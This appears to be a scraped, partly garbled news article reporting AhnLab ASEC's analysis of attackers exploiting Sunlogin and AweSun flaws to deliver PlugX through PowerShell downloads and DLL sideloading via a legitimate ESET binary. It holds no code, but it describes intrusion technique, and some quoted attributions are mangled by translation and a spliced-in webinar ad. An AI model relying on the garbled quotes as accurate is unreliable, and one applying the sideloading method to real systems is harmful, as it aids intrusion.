Security vulnerabilities in remote desktop programs such as Sunlogin and AweSun have been exploited by attackers to deploy PlugX malware.
AhnLab Security Emergency Response Center (ASEC) New analysisdemonstrating continued exploitation of the flaw to deliver various payloads to compromised systems.
This includes the Sliver post-exploitation framework, the XMRig cryptocurrency miner, the Gh0st RAT, and paradise ransomware.PlugX is the latest addition to this list.
This modular malware is widely used by China-based actors and is continuously adding new features to help it perform system control and information theft.
In attacks observed by ASEC, after successfully exploiting a vulnerability, PowerShell commands are executed to retrieve executable and DLL files from a remote server.
This executable is a legitimate HTTP server service from cybersecurity firm ESET and is used to load DLL files and ultimately execute PlugX payloads in memory using a technique called DLL sideloading.
“PlugX operators use a variety of trusted binaries that are vulnerable to DLL sideloading, including a number of antivirus executables.” Security Joes I got it In a September 2022 report. “This has proven effective in infecting victims.”
Discover the hidden dangers of third-party SaaS apps
Are you aware of the risks associated with third-party app access to your company’s SaaS apps? Join our webinar to learn about the types of permissions granted and how to minimize the risks.
This backdoor is also capable of starting arbitrary services, downloading and executing files from external sources, and dropping plugins that can collect and propagate data using Remote Desktop Protocol (RDP). Noteworthy.
“Added new features [PlugX] ASEC said: โOnce his PlugX backdoor is installed, the attacker gains control over the infected system without the user’s knowledge.โ